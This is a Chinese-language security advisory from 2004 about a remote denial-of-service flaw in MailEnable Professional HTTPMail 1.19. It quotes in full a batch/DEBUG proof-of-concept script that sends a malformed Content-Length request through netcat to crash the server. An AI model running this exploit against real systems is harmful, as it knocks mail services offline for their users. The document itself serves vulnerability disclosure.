MailEnable Professional HTTPMail远程拒绝服务漏洞
发布日期:2004-08-02
更新日期:2004-08-03
受影响系统:MailEnable MailEnable Professional 1.19
描述:
BUGTRAQ ID:
10838
MailEnable Professional HTTPMail是一款基于WEB的邮件处理程序。
MailEnable Professional HTTPMail不正确处理部分HTTP请求数据,远程攻击者可以利用这个漏洞对AP服务进行拒绝服务攻击。
由于对攻击者提交的GET请求缺少正确处理,提交包含恶意"Content-Length: "字段的HTTP数据,可导致服务崩溃,停止正常服务的响应。
<*来源:CoolICE (
CoolICE@China.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=109146442215835&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
CoolICE (
CoolICE@China.com)提供了如下测试方法:
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application: MailEnable Professional HTTPMail
:Vendors:
http://www.mailenable.com/
:Version: 1.19
:Platforms: Windows
:Bug: D.O.S
:Date: 2004-07-30
:Author: CoolICE
:E_mail: CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
;set PORT=8080
;if not '%2'=='' set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe
echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run
e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS@length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q
:run
nc %1 %PORT% < http.tmp
del http.tmp
建议:
厂商补丁:
MailEnable
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mailenable.com/浏览次数:4240
严重程度:0(网友投票)